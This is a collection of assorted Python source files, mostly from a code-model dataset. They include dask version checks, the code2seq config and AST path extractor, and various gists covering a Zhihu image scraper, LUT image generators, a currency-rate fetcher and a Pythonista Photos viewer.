"source": "jjhelmus/distributed",
"score": 2
} |
#### File: distributed/distributed/versions.py
```python
from __future__ import print_function, division, absolute_import
from collections import defaultdict
import platform
import struct
import os
import sys
import importlib
required_packages = [
("dask", lambda p: p.__version__),
("distributed", lambda p: p.__version__),
("msgpack", lambda p: ".".join([str(v) for v in p.version])),
("cloudpickle", lambda p: p.__version__),
("tornado", lambda p: p.version),
("toolz", lambda p: p.__version__),
]
optional_packages = [
("numpy", lambda p: p.__version__),
("lz4", lambda p: p.__version__),
("blosc", lambda p: p.__version__),
]
# only these scheduler packages will be checked for version mismatch
scheduler_relevant_packages = set(pkg for pkg, _ in required_packages) | set(
["lz4", "blosc"]
)
def get_versions(packages=None):
"""
Return basic information on our software installation, and our installed versions of packages.
"""
if packages is None:
packages = []
d = {
"host": get_system_info(),
"packages": get_package_info(
required_packages + optional_packages + list(packages)
),
}
return d
def get_system_info():
(sysname, nodename, release, version, machine, processor) = platform.uname()
host = {
"python": "%d.%d.%d.%s.%s" % sys.version_info[:],
"python-bits": struct.calcsize("P") * 8,
"OS": "%s" % sysname,
"OS-release": "%s" % release,
"machine": "%s" % machine,
"processor": "%s" % processor,
"byteorder": "%s" % sys.byteorder,
"LC_ALL": "%s" % os.environ.get("LC_ALL", "None"),
"LANG": "%s" % os.environ.get("LANG", "None"),
}
return host
def version_of_package(pkg):
""" Try a variety of common ways to get the version of a package """
from .utils import ignoring
with ignoring(AttributeError):
return pkg.__version__
with ignoring(AttributeError):
return str(pkg.version)
with ignoring(AttributeError):
return ".".join(map(str, pkg.version_info))
return None
def get_package_info(pkgs):
""" get package versions for the passed required & optional packages """
pversions = []
for pkg in pkgs:
if isinstance(pkg, (tuple, list)):
modname, ver_f = pkg
else:
modname = pkg
ver_f = version_of_package
if ver_f is None:
ver_f = version_of_package
try:
mod = importlib.import_module(modname)
ver = ver_f(mod)
pversions.append((modname, ver))
except Exception:
pversions.append((modname, None))
return dict(pversions)
def error_message(scheduler, workers, client, client_name="client"):
from .utils import asciitable
nodes = {**{client_name: client}, **{"scheduler": scheduler}, **workers}
# Hold all versions, e.g. versions["scheduler"]["distributed"] = 2.9.3
node_packages = defaultdict(dict)
# Collect all package versions
packages = set()
for node, info in nodes.items():
if info is None or not (isinstance(info, dict)) or "packages" not in info:
node_packages[node] = defaultdict(lambda: "UNKNOWN")
else:
node_packages[node] = defaultdict(lambda: "MISSING")
for pkg, version in info["packages"].items():
node_packages[node][pkg] = version
packages.add(pkg)
# Collect Python version for each node
node_packages[node]["python"] = info["host"]["python"]
packages.add("python")
errs = []
for pkg in sorted(packages):
versions = set(
node_packages[node][pkg]
for node in nodes
if node != "scheduler" or pkg in scheduler_relevant_packages
)
if len(versions) <= 1:
continue
rows = [
(node_name, node_packages[node_name][pkg]) for node_name in nodes.keys()
]
errs.append("%s\n%s" % (pkg, asciitable(["", "version"], rows)))
if errs:
return "Mismatched versions found\n" "\n" "%s" % ("\n\n".join(errs))
else:
return ""
class VersionMismatchWarning(Warning):
"""Indicates version mismatch between nodes"""
``` |
{
"source": "jjhelmus/leastsqbound-scipy",
"score": 3
} |
#### File: jjhelmus/leastsqbound-scipy/test_linear.py
```python
import numpy as np
from scipy.optimize import leastsq
from leastsqbound import leastsqbound
def func(p, x):
"""model data as y = m*x+b """
m, b = p
return m * np.array(x) + b
def err(p, y, x):
return y - func(p, x)
# extract data
temp = np.genfromtxt("sample_data.dat")
x = temp[:, 0]
y = temp[:, 1]
# perform unbounded least squares fitting
p0 = [1.0, 0.0]
p, cov_x, infodic, mesg, ier = leastsq(err, p0, args=(y, x), full_output=True)
# print out results
print "Standard Least Squares fitting results:"
print "p:", p
print "cov_x:", cov_x
print "infodic['nfev']:", infodic['nfev']
print "infodic['fvec']:", infodic['fvec']
print "infodic['fjac']:", infodic['fjac']
print "infodic['ipvt']:", infodic['ipvt']
print "infodic['qtf']:", infodic['qtf']
print "mesg:", mesg
print "ier:", ier
print ""
# same as above using no bounds
p0 = [1.0, 0.0]
p, cov_x, infodic, mesg, ier = leastsqbound(err, p0, args=(y, x),
full_output=True)
# print out results
print "Bounded Least Squares fitting with no bounds results:"
print "p:", p
print "cov_x:", cov_x
print "infodic['nfev']:", infodic['nfev']
print "infodic['fvec']:", infodic['fvec']
print "infodic['fjac']:", infodic['fjac']
print "infodic['ipvt']:", infodic['ipvt']
print "infodic['qtf']:", infodic['qtf']
print "mesg:", mesg
print "ier:", ier
print ""
# perform bounded least squares fitting
p0 = [1.0, 0.0]
bounds = [(0.0, 2.0), (-10.0, 10.0)]
p, cov_x, infodic, mesg, ier = leastsqbound(err, p0, args=(y, x),
bounds = bounds, full_output=True)
# print out results
print "Bounded Least Squares fitting results:"
print "p:", p
print "cov_x:", cov_x
print "infodic['nfev']:", infodic['nfev']
print "infodic['fvec']:", infodic['fvec']
print "infodic['fjac']:", infodic['fjac']
print "infodic['ipvt']:", infodic['ipvt']
print "infodic['qtf']:", infodic['qtf']
print "mesg:", mesg
print "ier:", ier
``` |
{
"source": "jjhelmus/scikit-image",
"score": 2
} |
#### File: scikit-image/skimage/__init__.py
```python
import os.path as osp
import imp
import functools
import warnings
import sys
pkg_dir = osp.abspath(osp.dirname(__file__))
data_dir = osp.join(pkg_dir, 'data')
__version__ = '0.13dev'
try:
imp.find_module('nose')
except ImportError:
def _test(doctest=False, verbose=False):
"""This would run all unit tests, but nose couldn't be
imported so the test suite can not run.
"""
raise ImportError("Could not load nose. Unit tests not available.")
else:
def _test(doctest=False, verbose=False):
"""Run all unit tests."""
import nose
args = ['', pkg_dir, '--exe', '--ignore-files=^_test']
if verbose:
args.extend(['-v', '-s'])
if doctest:
args.extend(['--with-doctest', '--ignore-files=^\.',
'--ignore-files=^setup\.py$$', '--ignore-files=test'])
# Make sure warnings do not break the doc tests
with warnings.catch_warnings():
warnings.simplefilter("ignore")
success = nose.run('skimage', argv=args)
else:
success = nose.run('skimage', argv=args)
# Return sys.exit code
if success:
return 0
else:
return 1
# do not use `test` as function name as this leads to a recursion problem with
# the nose test suite
test = _test
test_verbose = functools.partial(test, verbose=True)
test_verbose.__doc__ = test.__doc__
doctest = functools.partial(test, doctest=True)
doctest.__doc__ = doctest.__doc__
doctest_verbose = functools.partial(test, doctest=True, verbose=True)
doctest_verbose.__doc__ = doctest.__doc__
# Logic for checking for improper install and importing while in the source
# tree when package has not been installed inplace.
# Code adapted from scikit-learn's __check_build module.
_INPLACE_MSG = """
It appears that you are importing a local scikit-image source tree. For
this, you need to have an inplace install. Maybe you are in the source
directory and you need to try from another location."""
_STANDARD_MSG = """
Your install of scikit-image appears to be broken.
Try re-installing the package following the instructions at:
http://scikit-image.org/docs/stable/install.html """
def _raise_build_error(e):
# Raise a comprehensible error
local_dir = osp.split(__file__)[0]
msg = _STANDARD_MSG
if local_dir == "skimage":
# Picking up the local install: this will work only if the
# install is an 'inplace build'
msg = _INPLACE_MSG
raise ImportError("""%s
It seems that scikit-image has not been built correctly.
%s""" % (e, msg))
try:
# This variable is injected in the __builtins__ by the build
# process. It used to enable importing subpackages of skimage when
# the binaries are not built
__SKIMAGE_SETUP__
except NameError:
__SKIMAGE_SETUP__ = False
if __SKIMAGE_SETUP__:
sys.stderr.write('Partial import of skimage during the build process.\n')
# We are not importing the rest of the scikit during the build
# process, as it may not be compiled yet
else:
try:
from ._shared import geometry
del geometry
except ImportError as e:
_raise_build_error(e)
from .util.dtype import *
if sys.version.startswith('2.6'):
msg = ("Python 2.6 is deprecated and will not be supported in "
"scikit-image 0.13+")
warnings.warn(msg, stacklevel=2)
del warnings, functools, osp, imp, sys
``` |
{
"source": "jjhenkel/code2seq",
"score": 2
} |
#### File: jjhenkel/code2seq/config.py
```python
class Config:
@staticmethod
def get_default_config(args):
config = Config(args)
config.NUM_EPOCHS = 3000
config.SAVE_EVERY_EPOCHS = 1
config.PATIENCE = 10
config.BATCH_SIZE = args.batch_size if args.batch_size is not None else 512
config.TEST_BATCH_SIZE = 256
config.READER_NUM_PARALLEL_BATCHES = 1
config.SHUFFLE_BUFFER_SIZE = 10000
config.CSV_BUFFER_SIZE = 100 * 1024 * 1024 # 100 MB
config.MAX_CONTEXTS = 200
config.SUBTOKENS_VOCAB_MAX_SIZE = 190000
config.TARGET_VOCAB_MAX_SIZE = 27000
config.EMBEDDINGS_SIZE = 128
config.RNN_SIZE = 128 * 2 # Two LSTMs to embed paths, each of size 128
config.DECODER_SIZE = 320
config.NUM_DECODER_LAYERS = 1
config.MAX_PATH_LENGTH = 8 + 1
config.MAX_NAME_PARTS = 5
config.MAX_TARGET_PARTS = 6
config.EMBEDDINGS_DROPOUT_KEEP_PROB = 0.75
config.RNN_DROPOUT_KEEP_PROB = 0.5
config.BIRNN = True
config.RANDOM_CONTEXTS = True
config.BEAM_WIDTH = 0
config.USE_MOMENTUM = True
return config
def take_model_hyperparams_from(self, otherConfig):
self.EMBEDDINGS_SIZE = otherConfig.EMBEDDINGS_SIZE
self.RNN_SIZE = otherConfig.RNN_SIZE
self.DECODER_SIZE = otherConfig.DECODER_SIZE
self.NUM_DECODER_LAYERS = otherConfig.NUM_DECODER_LAYERS
self.BIRNN = otherConfig.BIRNN
if self.DATA_NUM_CONTEXTS <= 0:
self.DATA_NUM_CONTEXTS = otherConfig.DATA_NUM_CONTEXTS
def __init__(self, args):
self.NUM_EPOCHS = 0
self.SAVE_EVERY_EPOCHS = 0
self.PATIENCE = 0
self.BATCH_SIZE = 0
self.TEST_BATCH_SIZE = 0
self.READER_NUM_PARALLEL_BATCHES = 0
self.SHUFFLE_BUFFER_SIZE = 0
self.CSV_BUFFER_SIZE = None
self.TRAIN_PATH = args.data_path
self.TEST_PATH = args.test_path if args.test_path is not None else ''
self.DATA_NUM_CONTEXTS = 0
self.MAX_CONTEXTS = 0
self.SUBTOKENS_VOCAB_MAX_SIZE = 0
self.TARGET_VOCAB_MAX_SIZE = 0
self.EMBEDDINGS_SIZE = 0
self.RNN_SIZE = 0
self.DECODER_SIZE = 0
self.NUM_DECODER_LAYERS = 0
self.SAVE_PATH = args.save_path_prefix
self.LOAD_PATH = args.load_path
self.MAX_PATH_LENGTH = 0
self.MAX_NAME_PARTS = 0
self.MAX_TARGET_PARTS = 0
self.EMBEDDINGS_DROPOUT_KEEP_PROB = 0
self.RNN_DROPOUT_KEEP_PROB = 0
self.BIRNN = False
self.RANDOM_CONTEXTS = True
self.BEAM_WIDTH = 1
self.USE_MOMENTUM = True
self.RELEASE = args.release
@staticmethod
def get_debug_config(args):
config = Config(args)
config.NUM_EPOCHS = 3000
config.SAVE_EVERY_EPOCHS = 100
config.PATIENCE = 200
config.BATCH_SIZE = 7
config.TEST_BATCH_SIZE = 7
config.READER_NUM_PARALLEL_BATCHES = 1
config.SHUFFLE_BUFFER_SIZE = 10
config.CSV_BUFFER_SIZE = None
config.MAX_CONTEXTS = 5
config.SUBTOKENS_VOCAB_MAX_SIZE = 190000
config.TARGET_VOCAB_MAX_SIZE = 27000
config.EMBEDDINGS_SIZE = 19
config.RNN_SIZE = 10
config.DECODER_SIZE = 11
config.NUM_DECODER_LAYERS = 1
config.MAX_PATH_LENGTH = 8 + 1
config.MAX_NAME_PARTS = 5
config.MAX_TARGET_PARTS = 6
config.EMBEDDINGS_DROPOUT_KEEP_PROB = 1
config.RNN_DROPOUT_KEEP_PROB = 1
config.BIRNN = True
config.RANDOM_CONTEXTS = True
config.BEAM_WIDTH = 0
config.USE_MOMENTUM = False
return config
```
#### File: code2seq/Python150kExtractor/extract.py
```python
import argparse
import re
import os
import json
import multiprocessing
import itertools
import tqdm
import numpy as np
from pathlib import Path
from sklearn import model_selection as sklearn_model_selection
METHOD_NAME, NUM = 'METHODNAME', 'NUM'
RT_REGEX = re.compile('\'?"?REPLACEME\d+"?\'?')
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', required=True, type=str)
parser.add_argument('--max_path_length', type=int, default=8)
parser.add_argument('--max_path_width', type=int, default=2)
parser.add_argument('--use_method_name', type=bool, default=True)
parser.add_argument('--use_nums', type=bool, default=True)
parser.add_argument('--output_dir', required=True, type=str)
parser.add_argument('--n_jobs', type=int, default=multiprocessing.cpu_count())
parser.add_argument('--seed', type=int, default=239)
def __collect_asts(json_file):
return list(filter(
None,
[ x.strip() for x in open(json_file, 'r', encoding='utf-8').readlines() ]
))
def __maybe_rt(value):
if RT_REGEX.match(value):
return "@R_" + value.strip().replace("REPLACEME", "").replace("'", '').replace('"', '') + "@"
return value
def __maybe_rt_str(value):
if RT_REGEX.match(value):
return "@R_" + value.strip().replace("REPLACEME", "").replace("'", '').replace('"', '') + "@"
value = re.sub(
"[^A-Za-z0-9|]", "",
re.sub(
r'["\',]', "",
re.sub(
r'\s+', '|', value.lower().replace('\\\\n', '')
)
)
).strip('|')
return value
def __terminals(ast, node_index, args):
stack, paths = [], []
def dfs(v):
# Skip DEF node
if v == node_index + 1:
return
stack.append(v)
v_node = ast[v]
if 'value' in v_node:
if v == node_index + 2: # Top-level func def node.
if args.use_method_name:
paths.append((stack.copy(), METHOD_NAME))
else:
v_type = v_node['type']
if v_type == "NAME":
paths.append((stack.copy(), __maybe_rt(v_node['value'])))
elif args.use_nums and v_type == 'NUMBER':
paths.append((stack.copy(), NUM))
elif v_type == 'STRING':
paths.append((stack.copy(), __maybe_rt_str(v_node['value'][:50])))
else:
pass
if 'children' in v_node:
for child in v_node['children']:
dfs(child)
stack.pop()
dfs(node_index)
return paths
def __merge_terminals2_paths(v_path, u_path):
s, n, m = 0, len(v_path), len(u_path)
while s < min(n, m) and v_path[s] == u_path[s]:
s += 1
prefix = list(reversed(v_path[s:]))
lca = v_path[s - 1]
suffix = u_path[s:]
return prefix, lca, suffix
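# Worked example (illustrative node indices): for v_path = [1, 2, 3, 5] and
# u_path = [1, 2, 4, 6] the common prefix ends after node 2, so this returns
# prefix = [5, 3] (v's tail walked back up towards the LCA), lca = 2, and
# suffix = [4, 6] (walked down to u's terminal), i.e. the terminal-to-terminal
# path 5 -> 3 -> 2 -> 4 -> 6.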
def __raw_tree_paths(ast, node_index, args):
tnodes = __terminals(ast, node_index, args)
tree_paths = []
for (v_path, v_value), (u_path, u_value) in itertools.combinations(
iterable=tnodes,
r=2,
):
prefix, lca, suffix = __merge_terminals2_paths(v_path, u_path)
if (len(prefix) + 1 + len(suffix) <= args.max_path_length) \
and (abs(len(prefix) - len(suffix)) <= args.max_path_width):
path = prefix + [lca] + suffix
tree_path = v_value, path, u_value
tree_paths.append(tree_path)
return tree_paths
def __delim_name(name):
if name.startswith("@R_") and name.endswith("@"):
return name
if name in {METHOD_NAME, NUM}:
return name
def camel_case_split(identifier):
matches = re.finditer(
'.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)',
identifier,
)
return [m.group(0) for m in matches]
blocks = []
for underscore_block in name.split('_'):
for bar_block in underscore_block.split('|'):
blocks.extend(camel_case_split(bar_block))
return '|'.join(block.lower()[:50] for block in blocks)
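# Example of the sub-tokenization above (hypothetical identifier): a name such
# as 'parse_HTTPHeader' is split on '_' and '|' and then on camelCase
# boundaries, yielding 'parse|http|header'. Replacement tokens (@R_n@) and the
# METHOD_NAME / NUM placeholders are passed through unchanged.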
def __collect_sample(ast, fd_index, args):
root = ast[fd_index]
if root['type'] != 'funcdef':
raise ValueError('Wrong node type.')
target = ast[fd_index + 2]['value']
tree_paths = __raw_tree_paths(ast, fd_index, args)
contexts = []
for tree_path in tree_paths:
start, connector, finish = tree_path
start, finish = __delim_name(start), __delim_name(finish)
connector = '|'.join(ast[v]['type'] for v in connector)
context = f'{start},{connector},{finish}'
contexts.append(context)
if len(contexts) == 0:
return None
target = __delim_name(target)
context = ' '.join(contexts)
return f'{target} {context}'
def __collect_samples(as_tuple):
ast = json.loads(as_tuple[0])
args = as_tuple[1]
samples = []
for node_index, node in enumerate(ast['ast']):
if node['type'] == 'funcdef':
sample = __collect_sample(ast['ast'], node_index, args)
if sample is not None:
samples.append((ast['from_file'], sample))
return samples
def __collect_all_and_save(asts, args, output_file):
targets = [ (ast, args) for ast in asts ]
pool = multiprocessing.Pool()
samples = list(itertools.chain.from_iterable(tqdm.tqdm(
pool.imap_unordered(__collect_samples, targets, len(targets) // args.n_jobs),
desc=" + Collecting and saving to: '{}'".format(output_file),
total=len(targets)
)))
with open(output_file, 'w') as f:
for line_index, (from_file, line) in enumerate(samples):
f.write(from_file + ' ' + line + ('' if line_index == len(samples) - 1 else '\n'))
def main():
print("Collecting python ASTs (extract.py):")
args = parser.parse_args()
np.random.seed(args.seed)
data_dir = Path(args.data_dir)
train = __collect_asts(data_dir / 'train.json')
test = __collect_asts(data_dir / 'test.json')
valid = __collect_asts(data_dir / 'valid.json')
output_dir = Path(args.output_dir)
output_dir.mkdir(exist_ok=True)
for split_name, split in zip(
('train', 'valid', 'test'),
(train, valid, test),
):
output_file = output_dir / f'{split_name}_output_file.txt'
__collect_all_and_save(split, args, output_file)
print("Checking for baseline.json...")
if (data_dir / 'baseline.json').exists():
print(" + Exists")
        baseline = __collect_asts(data_dir / 'baseline.json')
        output_file = output_dir / f'baseline_output_file.txt'
        __collect_all_and_save(baseline, args, output_file)
print("Complete!")
if __name__ == '__main__':
main()
``` |
{
"source": "jjhenkel/dockerizeme",
"score": 3
} |
#### File: hard-gists/00056d4304c58a035c87cdf5ff1e5e3e/snippet.py
```python
import copy
from scrapy import Field, Item
from scrapy.loader.processors import MapCompose
# strip_whitespace is not defined in the original gist; a minimal assumed
# implementation is provided here so the MapCompose pipeline is usable.
def strip_whitespace(value):
    return value.strip() if hasattr(value, 'strip') else value
class ModelItem(Item):
"""
Make Peewee models easily turn into Scrapy Items.
>>> from models import Player
>>> item = ModelItem(Player())
"""
def __init__(self, model, **kwds):
super(self.__class__, self).__init__()
self._model = model
for key in model._meta.fields.keys():
self.fields[key] = Field()
if kwds is not None:
for key, processor in kwds.iteritems():
self.fields[key] = Field(input_processor=MapCompose(
strip_whitespace, processor
))
def __setitem__(self, key, value):
if key not in self.fields:
self.fields[key] = Field()
self._values[key] = value
def copy(self):
return copy.deepcopy(self)
@property
def model(self):
return self._model
```
#### File: hard-gists/035dc3b722b7f89cce66520dde285c9a/snippet.py
```python
import sys
from argparse import ArgumentParser
from swift.common.direct_client import direct_get_suffix_hashes
from swift.common.storage_policy import POLICIES
parser = ArgumentParser()
parser.add_argument('--policy-index', default=0, help='policy index')
parser.add_argument('part', help='the part')
parser.add_argument('-s', '--suffix', nargs='*',
help='any suffixes to recalculate')
parser.add_argument('-d', '--device', help='limit command to single node')
def main():
args = parser.parse_args()
policy = POLICIES[args.policy_index]
policy.load_ring('/etc/swift/')
ring = policy.object_ring
suffixes = args.suffix or []
for node in ring.devs:
if node is None:
continue
if args.device and node['device'] != args.device:
continue
data = direct_get_suffix_hashes(
node, args.part, suffixes, headers={
'x-backend-storage-policy-index': int(policy)})
print node['ip'], node['port'], node['device']
print data
if __name__ == "__main__":
sys.exit(main())
```
#### File: hard-gists/037e4134d8271c0de71b838a461e7ac1/snippet.py
```python
import requests
import re
import json
import time
from PIL import Image
import cStringIO
import cookielib
import urllib
import os
api_url='https://www.zhihu.com/node/QuestionAnswerListV2'
login_url='https://www.zhihu.com/login/'
topic_url='https://www.zhihu.com/question/'
headers={
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
}
session=requests.Session()
session.headers=headers
session.cookies = cookielib.LWPCookieJar(filename='cookies')
try:
session.cookies.load(ignore_discard=True)
except:
    print u"Not logged in yet, please log in first"
def get_xsrf(url="http://www.zhihu.com"):
    '''_xsrf is a dynamically changing parameter'''
global session
index_url = url
index_page = session.get(index_url)
html = index_page.content
pattern = r'name="_xsrf" value="(.*?)"'
_xsrf = re.findall(pattern, html)
return _xsrf[0]
def ImageScale(url,session=None):
if session==None:
session=requests.Session()
file = cStringIO.StringIO(session.get(url).content)
img = Image.open(file)
img.show()
def get_captcha():
global session
t=str(int(time.time()*1000))
captcha_url='https://www.zhihu.com/captcha.gif?r=%s&type=login'%t
print captcha_url
ImageScale(captcha_url,session)
    print u'Please enter the captcha:'
yzm=raw_input()
return yzm
def isLogin():
global session
url = "https://www.zhihu.com/settings/profile"
login_code = session.get(url, allow_redirects=False).status_code
if int(x=login_code) == 200:
return True
else:
return False
def login(email,passwd):
global session
isemail=re.search('@',email)
if isemail:
loginurl=login_url+'email'
data={'_xsrf':get_xsrf()
,'password':<PASSWORD>
,'remember_me':'true'
,'email':email}
else:
loginurl=login_url+'phone_num'
data={'_xsrf':get_xsrf()
,'password':<PASSWORD>
,'remember_me':'true'
,'phone_num':email}
try:
login_page=session.post(loginurl,data=data)
login_code=login_page.content
print login_page.status
print login_code
except:
data['captcha']=get_captcha()
login_page=session.post(loginurl,data=data)
login_code=json.loads(login_page.content)
print login_code['msg']
session.cookies.save()
def get_pic_from_topic(id,offset):
global session
topicurl=topic_url+str(id)
_xsrf=get_xsrf(topicurl)
pic_re=re.compile('data-actualsrc="(.*?)"')
inner_data={"url_token":id
,"pagesize":10
,"offset":offset
}
data={'method':'next'
,'params':json.dumps(inner_data)
}
session.headers['Referer']=topicurl
session.headers['Host']='www.zhihu.com'
session.headers['Origin']='https://www.zhihu.com'
session.headers['X-Xsrftoken']=_xsrf
js_data=session.post(api_url,data=data)
dat=json.loads(js_data.content)['msg']
pictures=[]
for d in dat:
pics=pic_re.findall(d)
picss=[re.sub('_b','_r',x) for x in pics]
pictures.extend(picss)
return pictures
def downloader(url,path):
try:
filename=url.split('/')[-1]
save=os.path.join(path,filename)
        print u'Downloading ',filename
urllib.urlretrieve(url,filename=save)
except Exception,e:
        print u'Download failed, error message:'
print e
if __name__=='__main__':
    email='your Zhihu account'
passwd='<PASSWORD>'
is_login=isLogin()
if not is_login:
login(email,passwd)
offset=0
pictures=[]
    print u"""####################\n# Zhihu Image Downloader #\n####################
"""
    print u"Please enter a Zhihu question id, e.g. for https://www.zhihu.com/question/52049909 the id is 52049909"
id=input()
    print u'=====Start parsing====='
while 1:
        print u"+++++Parsing page %d+++++"%(offset/10+1)
pics=get_pic_from_topic(id,offset)
if len(pics)==0:
            print u"Parsing finished, found %d images in total"%len(pictures)
break
pictures.extend(pics)
offset+=10
    print u"=====Start downloading images====="
basepath=os.path.abspath('.')
savepath=os.path.join(basepath,str(id))
if not os.path.exists(savepath):
os.mkdir(savepath)
for pic in pictures:
downloader(pic,savepath)
    print u"=====Download complete====="
```
#### File: hard-gists/09b1f5403c63ceab5ae34710cbe2809e/snippet.py
```python
import cv2
import numpy as np
def make_lut256x16(exportPath):
''' 256 x 16 LUT '''
colors = []
for y in range(0, 16):
rows = []
for x in range(0, 256):
rows.append([
(x / 16) * 16, # blue
y * 16, # green
(x % 16) * 16 # red
])
colors.append(rows)
image = np.array(colors)
if exportPath:
cv2.imwrite(exportPath, image)
return image
def make_lut1024x32(exportPath):
''' 1024 x 32 LUT '''
colors = []
for y in range(0, 32):
rows = []
for x in range(0, 1024):
rows.append([
(x / 32) * 8, # blue
y * 8, # green
(x % 32) * 8 # red
])
colors.append(rows)
image = np.array(colors)
if exportPath:
cv2.imwrite(exportPath, image)
return image
def make_lut512x512(exportPath):
''' 512 x 512 Basic LUT '''
colors = []
for y in range(0, 512):
rows = []
for x in range(0, 512):
i = (x % 64, y % 64)
rows.append([ # BGR
(y / 2 + x / 16), # blue
i[1] * 4, # green
i[0] * 4 # red
])
colors.append(rows)
image = np.array(colors)
if exportPath:
cv2.imwrite(exportPath, image)
return image
if __name__ == '__main__':
import argparse
import sys
parser = argparse.ArgumentParser(description='LUT Texture maker')
parser.add_argument('path',
type=str,
nargs='?',
default='lut.png',
help='output filename')
parser.add_argument('-s', '--size',
type=str,
nargs='?',
default='512x512',
help='256x16 or 1024x32 or 512x512')
args = parser.parse_args()
if args.size == '512x512':
make_lut512x512(args.path)
elif args.size == '256x16':
make_lut256x16(args.path)
elif args.size == '1024x32':
make_lut1024x32(args.path)
else:
sys.exit('Unsupported size')
```
#### File: hard-gists/0acf77b2c022e2467cfb0d5493d454d6/snippet.py
```python
from django import template
register = template.Library()
@register.filter(name='urltoname')
def urltoname(value):
"filter that extracts the filename from a URL"
x = str(value)
return x[x.rfind("/")+1:]
```
#### File: hard-gists/0b942dd86f01efe996b8977b158c37a6/snippet.py
```python
from urllib.parse import urlencode
from datetime import date, timedelta
import requests
def currency_conversion_rate(base, target, that_date='latest'):
"""
get the currency conversion rate for the specific date
"""
main_api = 'http://api.fixer.io/{}?'.format(that_date)
url = main_api + urlencode({'base':base})
json_data = requests.get(url).json()
try:
result = json_data['rates'][target]
# except requests.exceptions.ConnectionError:
# result = "Connection Error"
except KeyError:
result = 0.00
return result
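# For reference, the (legacy) fixer.io response consumed above looks roughly
# like this (simplified sketch, illustrative numbers):
#
#     {"base": "USD", "date": "2017-08-01", "rates": {"INR": 64.08, "EUR": 0.85}}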
def main(base, target, start_date, end_date):
step = timedelta(days=1)
total_days = 0
total_amount_sum = 0
while start_date < end_date:
that_date = start_date.strftime("%Y-%m-%d")
amount = currency_conversion_rate(base, target, that_date)
if amount != 0:
# because on fixer.io gives exchange rates for working days
# so we're only considering the days when we do have a rate available
# for more on this: https://github.com/hakanensari/fixer-io/issues/47
total_amount_sum += amount
total_days += 1
print(that_date, amount)
start_date += step
print(total_amount_sum/total_days)
if __name__ == '__main__':
START_DATE = date(2017, 8, 1)
END_DATE = date(2017, 8, 15)
main('USD', 'INR', START_DATE, END_DATE)
```
#### File: hard-gists/0d1baad4e3a871587ab1/snippet.py
```python
from tkinter import *
from tkinter import ttk
from tkinter.filedialog import askopenfilename
root = Tk( )
#This is where we lauch the file manager bar.
def OpenFile():
name = askopenfilename(initialdir="C:/Users/Batman/Documents/Programming/tkinter/",
filetypes =(("Text File", "*.txt"),("All Files","*.*")),
title = "Choose a file."
)
print (name)
#Using try in case user types in unknown file or closes without choosing a file.
try:
with open(name,'r') as UseFile:
print(UseFile.read())
except:
print("No file exists")
Title = root.title( "File Opener")
label = ttk.Label(root, text ="I'm BATMAN!!!",foreground="red",font=("Helvetica", 16))
label.pack()
#Menu Bar
menu = Menu(root)
root.config(menu=menu)
file = Menu(menu)
file.add_command(label = 'Open', command = OpenFile)
file.add_command(label = 'Exit', command = lambda:exit())
menu.add_cascade(label = 'File', menu = file)
root.mainloop()
'''
RESULTS:
>>>
C:/Users/Scott/Documents/Programming/json/test.txt
"I like to move it, groove it!"
'''
```
#### File: hard-gists/0d5a709bbb4186d1f45f2af14c65b110/snippet.py
```python
from objc_util import *
import threading
from io import BytesIO
from PIL import Image
import sys
import ui
import ctypes
NSBundle.bundleWithPath_('/System/Library/Frameworks/Photos.framework').load()
PHAsset = ObjCClass('PHAsset')
PHImageManager = ObjCClass('PHImageManager')
PHImageRequestOptions = ObjCClass('PHImageRequestOptions')
mgr = PHImageManager.defaultManager()
def nsdata2str(data):
return ctypes.string_at(data.bytes(), data.length())
class Asset (object):
def __init__(self, asset_obj):
self._asset = asset_obj
def __repr__(self):
return repr(self._asset)
def fetch_data(self):
'''Return a tuple of (UTI, data) for the asset. Both are strings, the UTI indicates the file type (e.g. 'public.jpeg').'''
e = threading.Event()
result = {}
def handler(_cmd, _data, _uti, orientation, _info):
if _data:
result['data'] = nsdata2str(ObjCInstance(_data))
result['uti'] = str(ObjCInstance(_uti))
result['orientation'] = orientation
result['info'] = ObjCInstance(_info)
e.set()
handler_block = ObjCBlock(handler, restype=None, argtypes=[c_void_p, c_void_p, c_void_p, NSInteger, c_void_p])
options = PHImageRequestOptions.new().autorelease()
options.networkAccessAllowed = True
options.synchronous = True
mgr.requestImageDataForAsset_options_resultHandler_(self._asset, options, handler_block)
e.wait()
return result
def fetch_ui_thumbnail(self):
a = self._asset
options = PHImageRequestOptions.new().autorelease()
options.networkAccessAllowed = True
options.synchronous = True
target_size = CGSize(80, 80)
result = {}
e = threading.Event()
def handler(_cmd, _result, _info):
result['image'] = ObjCInstance(_result)
e.set()
handler_block = ObjCBlock(handler, restype=None, argtypes=[c_void_p, c_void_p, c_void_p])
mgr.requestImageForAsset_targetSize_contentMode_options_resultHandler_( a, target_size, 0, options, handler_block)
e.wait()
return result['image']
def fetch_image(self):
'''Return the asset as a decoded PIL Image object.'''
info = self.fetch_data()
img_data = info['data']
orientation = info['orientation']
b = BytesIO(img_data)
img = Image.open(b)
# NOTE: Mirrored orientations are not supported here.
orientations = {1: 180, 2: 90, 3: -90}
rotation = orientations.get(orientation, 0)
if rotation != 0:
img = img.rotate(rotation)
return img
UICollectionView = ObjCClass('UICollectionView')
UICollectionViewFlowLayout = ObjCClass('UICollectionViewFlowLayout')
UICollectionViewCell = ObjCClass('UICollectionViewCell')
UIImageView = ObjCClass('UIImageView')
UIColor = ObjCClass('UIColor')
def collectionView_numberOfItemsInSection_(_self, _cmd, _cv, _sec):
ds = ObjCInstance(_self)
return len(ds.assets)
collectionView_numberOfItemsInSection_.encoding = 'q32@0:8@16q24'
def collectionView_cellForItemAtIndexPath_(_self, _cmd, _cv, _ip):
ds = ObjCInstance(_self)
ip = ObjCInstance(_ip)
cv = ObjCInstance(_cv)
asset = ds.assets[ip.item()]
thumb = asset.fetch_ui_thumbnail()
cell = cv.dequeueReusableCellWithReuseIdentifier_forIndexPath_('Cell', ip)
iv = cell.viewWithTag_(123)
if not iv:
iv_frame = cell.bounds()
iv = UIImageView.alloc().initWithFrame_(iv_frame).autorelease()
iv.setTag_(123)
iv.setContentMode_(2)
iv.setClipsToBounds_(True)
iv.setAutoresizingMask_(18)
cell.addSubview_(iv)
iv.setImage_(thumb)
return cell.ptr
